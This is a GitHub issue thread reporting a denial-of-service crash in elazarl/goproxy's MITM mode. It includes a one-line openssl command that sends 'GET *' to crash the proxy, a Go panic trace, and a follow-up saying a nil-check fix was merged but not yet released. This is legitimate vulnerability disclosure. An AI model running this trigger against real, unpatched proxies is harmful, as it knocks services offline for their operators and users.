goproxy v1.1 was discovered to contain an issue which can lead to Denial of Service (DoS) via unspecified vectors

g0ku704 commented 1 year ago

A HTTP request to HTTPS page replaced path the "/" with asterix "*" crashes the elazar/goproxy server in MITM mode.

Vulnerability can be triggered by running this command against elazarl/goproxy in MITM Mode.

echo -e "GET * HTTP/1.1\r\n" | openssl s_client -proxy localhost:8000 -connect "localhost:8000" -ign_eof

Similar to this

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x6b3260]

goroutine 1287 [running]:
github.com/elazarl/goproxy.(*ProxyHttpServer).handleHttps.func2()
        /go/pkg/mod/github.com/elazarl/goproxy@v0.0.0-20221015165544-a0805db90819/https.go:249 +0xd60
created by github.com/elazarl/goproxy.(*ProxyHttpServer).handleHttps
        /go/pkg/mod/github.com/elazarl/goproxy@v0.0.0-20221015165544-a0805db90819/https.go:211 +0x611

https://github.com/elazarl/goproxy/blob/master/https.go#L249

danmanor commented 1 year ago

Is this issue resolved ?

g0ku704 commented 1 year ago

Is this issue resolved ?

Yes, I've added a nil check that was causing the crash and merged with the main branch now. But the release package is not updated yet. (https://github.com/elazarl/goproxy/pull/507)

elazarl / goproxy

goproxy v1.1 was discovered to contain an issue which can lead to Denial of Service (DoS) via unspecified vectors #502